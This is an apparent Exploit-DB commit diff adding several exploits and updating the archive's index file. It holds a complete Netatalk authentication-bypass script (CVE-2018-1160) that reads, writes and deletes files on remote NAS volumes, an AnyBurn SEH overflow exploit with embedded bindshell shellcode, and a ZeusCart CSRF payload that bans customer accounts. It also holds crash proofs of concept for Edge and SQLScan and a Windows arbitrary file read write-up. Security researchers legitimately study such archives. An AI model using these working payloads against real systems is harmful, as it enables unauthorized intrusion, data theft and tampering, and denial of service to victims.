DB: 2018-12-22

6 changes to exploits/shellcodes

AnyBurn 4.3 - Local Buffer Overflow Denial of Service
AnyBurn 4.3 - Local Buffer Overflow (PoC)
Microsoft Edge 42.17134.1.0 - 'Tree::ANode::DocumentLayout' Denial of Service

SQLScan 1.0 - Denial of Service (PoC)
AnyBurn 4.3 - Local Buffer Overflow (SEH)
Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read

Netatalk < 3.1.12 - Authentication Bypass

ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)

exploits/multiple/remote/46034.py

@@ -0,0 +1,303 @@
+##
+# Exploit Title: Netatalk Authentication Bypass
+# Date: 12/20/2018
+# Exploit Author: Jacob Baines
+# Vendor Homepage: http://netatalk.sourceforge.net/
+# Software Link: https://sourceforge.net/projects/netatalk/files/
+# Version: Before 3.1.12
+# Tested on: Seagate NAS OS (x86_64)
+# CVE : CVE-2018-1160
+# Advisory: https://www.tenable.com/security/research/tra-2018-48
+##
+import argparse
+import socket
+import struct
+import sys
+
+# Known addresses:
+# This exploit was written against a Netatalk compiled for an
+# x86_64 Seagate NAS. The addresses below will need to be changed
+# for a different target.
+preauth_switch_base = '\x60\xb6\x63\x00\x00\x00\x00\x00' # 0x63b6a0
+afp_getsrvrparms = '\x60\xb6\x42\x00\x00\x00\x00\x00' # 0x42b660
+afp_openvol = '\xb0\xb8\x42\x00\x00\x00\x00\x00'  # 42b8b0
+afp_enumerate_ext2 = '\x90\x97\x41\x00\x00\x00\x00\x00' # 419790
+afp_openfork = '\xd0\x29\x42\x00\x00\x00\x00\x00' # 4229d0
+afp_read_ext = '\x30\x3a\x42\x00\x00\x00\x00\x00' # 423a30
+afp_createfile = '\x10\xcf\x41\x00\x00\x00\x00\x00' # 41cf10
+afp_write_ext = '\xb0\x3f\x42\x00\x00\x00\x00\x00' # 423fb0
+afp_delete = '\x20\x06\x42\x00\x00\x00\x00\x00' # 420620
+
+##
+# This is the actual exploit. Overwrites the commands pointer
+# with the base of the preauth_switch
+##
+def do_exploit(sock):
+	print "[+] Sending exploit to overwrite preauth_switch data."
+	data = '\x00\x04\x00\x01\x00\x00\x00\x00'
+	data += '\x00\x00\x00\x1a\x00\x00\x00\x00'
+	data += '\x01' # attnquant in open sess
+	data += '\x18' # attnquant size
+	data += '\xad\xaa\xaa\xba' # overwrites attn_quantum (on purpose)
+	data += '\xef\xbe\xad\xde' # overwrites datasize
+	data += '\xfe\xca\x1d\xc0' # overwrites server_quantum 
+	data += '\xce\xfa\xed\xfe' # overwrites the server id and client id
+	data += preauth_switch_base # overwrite the commands ptr
+	sock.sendall(data)
+
+	# don't really care about the respone
+	resp = sock.recv(1024)
+	return
+
+
+##
+# Sends a request to the server.
+#
+# @param socket the socket we are writing on
+# @param request_id two bytes. requests are tracked through the session
+# @param address the address that we want to jump to
+# @param param_string the params that the address will need
+##
+def send_request(socket, request_id, address, param_string):
+    data = '\x00' # flags
+    data += '\x02' # command
+    data += request_id
+    data += '\x00\x00\x00\x00' # data offset
+    data += '\x00\x00\x00\x90' # cmd length <=== always the same
+    data += '\x00\x00\x00\x00' # reserved
+    # ==== below gets copied into dsi->cmd =====
+    data += '\x11' # use the 25th entry in the pre_auth table. We'll write the function to execute there
+    data += '\x00' # pad
+    if (param_string == False):
+        data += ("\x00" * 134)
+    else:
+        data += param_string
+        data += ("\x00" * (134 - len(param_string)))
+
+    data += address # we'll jump to this address
+
+    sock.sendall(data)
+    return
+
+##
+# Parses the DSI header. If we don't get the expected request id
+# then we bail out.
+##
+def parse_dsi(payload, expected_req_id):
+	(flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
+	if command != 8:
+		if flags != 1 or command != 2 or req_id != expected_req_id:
+			print '[-] Bad DSI Header: %u %u %u' % (flags, command, req_id)
+			sys.exit(0)
+
+		if error_code != 0 and error_code != 4294962287:
+			print '[-] The server responded to with an error code: ' + str(error_code)
+			sys.exit(0)
+
+	afp_data = payload[16:]
+	if len(afp_data) != length:
+		if command != 8:
+			print '[-] Invalid length in DSI header: ' + str(length) + ' vs. ' + str(len(payload))
+			sys.exit(0)
+		else:
+			afp_data = afp_data[length:]
+			afp_data = parse_dsi(afp_data, expected_req_id)
+
+	return afp_data
+
+##
+# List all the volumes on the remote server
+##
+def list_volumes(sock):
+	print "[+] Listing volumes"
+	send_request(sock, "\x00\x01", afp_getsrvrparms, "")
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 1)
+	(server_time, volumes) = struct.unpack_from('>IB', afp_data)
+	print "[+] " + str(volumes) + " volumes are available:"
+
+	afp_data = afp_data[5:]
+	for i in range(volumes):
+		string_length = struct.unpack_from('>h', afp_data)
+		name = afp_data[2 : 2 + string_length[0]]
+		print "\t-> " + name
+		afp_data = afp_data[2 + string_length[0]:]
+
+	return
+
+##
+# Open a volume on the remote server
+##
+def open_volume(sock, request, params):
+	send_request(sock, request, afp_openvol, params)
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 1)
+	(bitmap, vid) = struct.unpack_from('>HH', afp_data)
+	return vid
+
+##
+# List the contents of a specific volume
+##
+def list_volume_content(sock, name):
+	print "[+] Listing files in volume " + name
+
+	# open the volume
+	length = struct.pack("b", len(name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + length + name)
+	print "[+] Volume ID is " + str(vid)
+
+	# enumerate
+	packed_vid = struct.pack(">h", vid)
+	send_request(sock, "\x00\x02", afp_enumerate_ext2, packed_vid + "\x00\x00\x00\x02\x01\x40\x01\x40\x07\xff\x00\x00\x00\x01\x7f\xff\xff\xff\x02\x00\x00\x00")
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 2)
+	(f_bitmap, d_bitmap, req_count) = struct.unpack_from('>HHH', afp_data)
+	afp_data = afp_data[6:]
+
+	print "[+] Files (%u):" % req_count
+	for i in range(req_count):
+		(length, is_dir, pad, something, file_id, name_length) = struct.unpack_from('>HBBHIB', afp_data)
+		name = afp_data[11:11+name_length]
+		if is_dir:
+			print "\t[%u] %s/" % (file_id, name)
+		else:
+			print "\t[%u] %s" % (file_id, name)
+		afp_data = afp_data[length:]
+
+##
+# Read the contents of a specific file.
+##
+def cat_file(sock, vol_name, file_name):
+	print "[+] Cat file %s in volume %s" % (file_name, vol_name)
+
+	# open the volume
+	vol_length = struct.pack("b", len(vol_name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
+	print "[+] Volume ID is " + str(vid)
+
+	# open fork
+	packed_vid = struct.pack(">h", vid)
+	file_length = struct.pack("b", len(file_name))
+	send_request(sock, "\x00\x02", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 2)
+	(f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
+	print "[+] Fork ID: %s" % (fork_id)
+
+	# read file
+	packed_fork = struct.pack(">h", fork_id)
+	send_request(sock, "\x00\x03", afp_read_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x03\x00")
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 3)
+	print "[+] File contents:"
+	print afp_data
+
+##
+# Create a file on the remote volume
+## 
+def write_file(sock, vol_name, file_name, data):
+	print "[+] Writing to %s in volume %s" % (file_name, vol_name)
+
+	# open the volume
+	vol_length = struct.pack("B", len(vol_name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
+	print "[+] Volume ID is " + str(vid)
+
+	# create the file
+	packed_vid = struct.pack(">H", vid)
+	file_length = struct.pack("B", len(file_name))
+	send_request(sock, "\x00\x02", afp_createfile, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
+	resp = sock.recv(1024)
+	afp_data = parse_dsi(resp, 2)
+
+	if len(afp_data) != 0:
+		sock.recv(1024)
+
+	# open fork
+	packed_vid = struct.pack(">H", vid)
+	file_length = struct.pack("B", len(file_name))
+	send_request(sock, "\x00\x03", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
+	resp = sock.recv(1024)
+
+	afp_data = parse_dsi(resp, 3)
+	(f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
+	print "[+] Fork ID: %s" % (fork_id)
+
+	# write
+	packed_fork = struct.pack(">H", fork_id)
+	data_length = struct.pack(">Q", len(data))
+	send_request(sock, "\x00\x04", afp_write_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + data_length + data)
+	#resp = sock.recv(1024)
+
+	sock.send(data + ("\x0a"*(144 - len(data))))
+	resp = sock.recv(1024)
+	afp_data = parse_dsi(resp, 4)
+	print "[+] Fin"
+
+##
+# Delete a file on the remote volume
+##
+def delete_file(sock, vol_name, file_name):
+	print "[+] Deleting %s from volume %s" % (file_name, vol_name)
+
+	# open the volume
+	vol_length = struct.pack("B", len(vol_name))
+	vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
+	print "[+] Volume ID is " + str(vid)
+
+	# delete the file
+	packed_vid = struct.pack(">H", vid)
+	file_length = struct.pack("B", len(file_name))
+	send_request(sock, "\x00\x02", afp_delete, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
+	resp = sock.recv(1024)
+	afp_data = parse_dsi(resp, 2)
+
+	print "[+] Fin"
+
+##
+##
+## Main
+##
+##
+
+top_parser = argparse.ArgumentParser(description='I\'m a little pea. I love the sky and the trees.')
+top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
+top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="548")
+top_parser.add_argument('-lv', '--list-volumes', action="store_true", dest="lv", help="List the volumes on the remote target.")
+top_parser.add_argument('-lvc', '--list-volume-content', action="store_true", dest="lvc", help="List the content of a volume.")
+top_parser.add_argument('-c', '--cat', action="store_true", dest="cat", help="Dump contents of a file.")
+top_parser.add_argument('-w', '--write', action="store_true", dest="write", help="Write to a new file.")
+top_parser.add_argument('-f', '--file', action="store", dest="file", help="The file to operate on")
+top_parser.add_argument('-v', '--volume', action="store", dest="volume", help="The volume to operate on")
+top_parser.add_argument('-d', '--data', action="store", dest="data", help="The data to write to the file")
+top_parser.add_argument('-df', '--delete-file', action="store_true", dest="delete_file", help="Delete a file")
+args = top_parser.parse_args()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
+sock.connect((args.ip, args.port))
+print "[+] Connected!"
+
+do_exploit(sock)
+if args.lv:
+	list_volumes(sock)
+elif args.lvc and args.volume != None:
+	list_volume_content(sock, args.volume)
+elif args.cat and args.file != None and args.volume != None:
+	cat_file(sock, args.volume, args.file)
+elif args.write and args.volume != None and args.file != None and args.data != None:
+	if len(args.data) > 144:
+		print "This implementation has a max file writing size of 144"
+		sys.exit(0)
+	write_file(sock, args.volume, args.file, args.data)
+elif args.delete_file and args.volume != None and args.file != None:
+	delete_file(sock, args.volume, args.file)
+else:
+	print("Bad args")
+
+sock.close()

exploits/php/webapps/46027.html

@@ -0,0 +1,22 @@
+# Exploit Title: ZeusCart4.0 Deactivate Customer Accounts CSRF
+# Date: 12/20/2018
+# Exploit Author: mqt
+# Vendor Homepage: http://http://www.zeuscart.com/
+# Version: Zeus Cart 4.0 CSRF
+
+1. Vulnerability Description
+
+Due to the form not being validated, ZeusCart4.0 suffers from a Cross
+Site Request Forgery vulnerability, which means an attacker can
+perform actions on behalf of a victim, by having the victim visit an
+attacker controlled site.
+
+In this case, the attacker is able to "deactivate" any customer
+accounts, which means that the account is banned and cannot login.
+
+Proof of Concept:
+<html>
+	<body>
+		<img style="display:none"msrc="http://localhost/admin/?do=regstatus&action=deny&id=2" alt="">
+	</body>
+</html>

exploits/windows/dos/46026.html

@@ -0,0 +1,42 @@
+# Exploit Title: Microsoft Edge edgehtml.dll!Tree::ANode::DocumentLayout. Denial of Service (PoC)
+# Google Dork: N/A
+# Date: 2018-11-11
+# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
+# Vendor Homepage: https://www.microsoft.com/
+# Version: Microsoft Edge 42.17134.1.0 (Microsoft EdgeHTML 17.17134)
+# Tested on: Windows 10 x64
+# CVE : N/A
+
+# Description:
+# Access violation while reading memory at 0x5C using a NULL pointer (microsoftedgecp.exe!edgehtml.dll!Tree::ANode::DocumentLayout)
+# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19594021/
+
+PoC.html
+
+<html>
+
+<head>
+
+<script>
+
+function ff() {
+	var v4= document.elementFromPoint(0,0);
+	v2.label = "C"; 
+	var v3= document.execCommand("selectAll", true);
+}
+
+</script>
+
+</head>
+
+<body onload=ff()>
+
+<select id="1" multiple="multiple">
+
+<optgroup id="v2" label="A">
+
+<option id="v1">
+
+</body>
+
+</html>

exploits/windows/dos/46030.py

@@ -0,0 +1,55 @@
+# Exploit Title: McAfee Foundstone SQLScan - Denial of Service (PoC) and EIP record overwrite
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2018-12-20
+# Vendor Homepage: http://www.mcafee.com/us/downloads/free-tools/sqlscan.aspx
+# Software Link : http://www.mcafee.com/us/downloads/free-tools/sqlscan.aspx
+# Tested Version: 1.0.0.0
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run SQLScan
+# 2.- copy content SQLScan_Crash.txt to clipboard (result from this python script)
+# 3.- Paste the content into the field: 'Hostname/IP'
+# 4.- Click '->' button and you will see a crash.
+
+
+'''
+EAX 00000001
+ECX 0012F8CC
+EDX 7C91E4F4 ntdll.KiFastSystemCallRet
+EBX 00000000
+ESP 0012FA80
+EBP 42424242
+ESI 00402FEB SQLScan.00402FEB
+EDI 0012FAD0
+EIP 43434343
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 1  CS 001B 32bit 0(FFFFFFFF)
+A 1  SS 0023 32bit 0(FFFFFFFF)
+Z 0  DS 0023 32bit 0(FFFFFFFF)
+S 1  FS 003B 32bit 7FFDF000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+               3 2 1 0      E S P U O Z D I
+FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+'''
+
+#!/usr/bin/env python
+
+junk = "\x41" * 384
+crash = junk + "BBBB" + "CCCC"
+f = open ("SQLScan_Crash.txt", "w")
+f.write(crash)
+f.close()

exploits/windows/local/46025.py

@@ -0,0 +1,69 @@
+#!/usr/bin/env python
+
+# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
+# Date: 20-12-2018
+# Exploit Author: Matteo Malvica
+# Vendor Homepage: http://www.anyburn.com/
+# Software Link : http://www.anyburn.com/anyburn_setup.exe
+# Tested Version: 4.3 (32-bit) 
+# Tested on: Windows 7 x64 SP1
+# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002
+
+# Steps to reproduce:
+# 1.- Run the python code
+# 2.- Open exploit.txt and copy its content to the clipboard
+# 3.- Open AnyBurn and choose 'Copy disk to Image'
+# 4.- Paste the content of exploit.txt into the field: 'Image file name'
+# 5.- Click 'Create Now' 
+# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
+# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'
+
+
+# alphanumeric bindshell - port 9988, courtesy of b33f
+shellcode = (
+"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
+"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
+"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
+"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
+"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
+"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
+"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
+"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
+"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
+"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
+"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
+"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
+"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
+"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")
+
+
+# total payload length 10000
+
+align = (
+"\x55"                      #push EBP - closer register to our shellcode, from where we are pivoting
+"\x6e"                      #Venetian Padding
+"\x58"                      #pop EAX
+"\x6e"                      #Venetian Padding
+"\x05\x22\x11"              #add eax,0x11002200  \
+"\x6e"                      #Venetian Padding     |> +0xB00 
+"\x2d\x17\x11"              #sub eax,0x11001700  /
+"\x6e"                      #Venetian Padding
+"\x50"                      #push EAX
+"\x6e"                      #Venetian Padding
+"\xC3")                     #RETN
+
+nseh = "\x94\x94" 			# ANSI x94 translates to Unicode 201D
+seh =  "\xb5\x4d" 			# 0x004d00b5 POP POP RET in AnyBurn.exe module
+
+preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
+unicode_nops = "\x58" * 200
+exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))
+
+try:
+	f=open("exploit.txt","w")
+	print "[+] Creating %s bytes lasagna payload.." %len(exploit)
+	f.write(exploit)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

exploits/windows/local/46028.txt

@@ -0,0 +1,18 @@
+The bug is in “MsiAdvertiseProduct”
+
+Calling this function will result in a file copy by the installer service.
+This will copy an arbitrary file that we can control with the first parameter into c:\windows\installer … a check gets done while impersonating, but using junctions there is still a TOCTOU .. meaning we can get it to copy any file as SYSTEM, and the destination file will always be readable. This results an in arbitrary file read vulnerability.
+
+To reproduce:
+Make sure to copy both readfile.exe and “file” (found under folder PoC-Files)… and put them in the same directory. 
+Useage: readfile.exe targetfile    (where targetfile is the file to read, IE: “readfile.exe c:\users\test\desktop\desktop.ini”)
+
+Run on 2 cores or more, this should work on one core with some modifications.. since you should be able to hit the timing with oplocks too (but I'm lazy)..  you should be able to see something like this if it works: https://www.youtube.com/watch?v=x4P2H64GI1o 
+
+The easiest way to confirm the bug is to make two local accounts and read the desktop.ini of the other account.
+
+Even without an enumeration vector, this is still bad news, because a lot of document software, like office, will actually keep files in static locations that contain the full path and filesnames of recently opened documents.. thus by reading files like this, you can get filenames of documents created by other users.. the filesystem is a spiderweb and references to user created files can be found everywhere.. so not having an enumeration bug is not that big of a deal.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46028.zip

files_exploits.csv

@@ -6217,11 +6217,13 @@ id,file,description,date,author,type,platform,port
 45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
 45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
 46001,exploits/windows/dos/46001.html,"Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write",2018-12-18,"Google Security Research",dos,windows,
-46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
+46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow (PoC)",2018-12-18,Achilles,dos,windows,
+46026,exploits/windows/dos/46026.html,"Microsoft Edge 42.17134.1.0 - 'Tree::ANode::DocumentLayout' Denial of Service",2018-12-21,"Bogdan Kurinnoy",dos,windows,
 46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
 46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
 46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows,
 46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows,
+46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10163,6 +10165,8 @@ id,file,description,date,author,type,platform,port
 46018,exploits/windows_x86/local/46018.py,"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)",2018-12-20,bzyo,local,windows_x86,
 46020,exploits/windows/local/46020.py,"XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution",2018-12-20,s7acktrac3,local,windows,
 46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows,
+46025,exploits/windows/local/46025.py,"AnyBurn 4.3 - Local Buffer Overflow (SEH)",2018-12-21,"Matteo Malvica",local,windows,
+46028,exploits/windows/local/46028.txt,"Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Read",2018-12-21,evil_polar_bear,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17024,6 +17028,7 @@ id,file,description,date,author,type,platform,port
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
 46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
+46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40518,3 +40523,4 @@ id,file,description,date,author,type,platform,port
 46014,exploits/php/webapps/46014.txt,"Bolt CMS < 3.6.2 - Cross-Site Scripting",2018-12-19,"Raif Berkay Dincel",webapps,php,80
 46015,exploits/php/webapps/46015.txt,"Yeswiki Cercopitheque - 'id' SQL Injection",2018-12-19,"Mickael BROUTY",webapps,php,80
 46017,exploits/multiple/webapps/46017.txt,"IBM Operational Decision Manager 8.x - XML External Entity Injection",2018-12-19,"Mohamed M.Fouad",webapps,multiple,9443
+46027,exploits/php/webapps/46027.html,"ZeusCart 4.0 - Cross-Site Request Forgery (Deactivate Customer Accounts)",2018-12-21,mqt,webapps,php,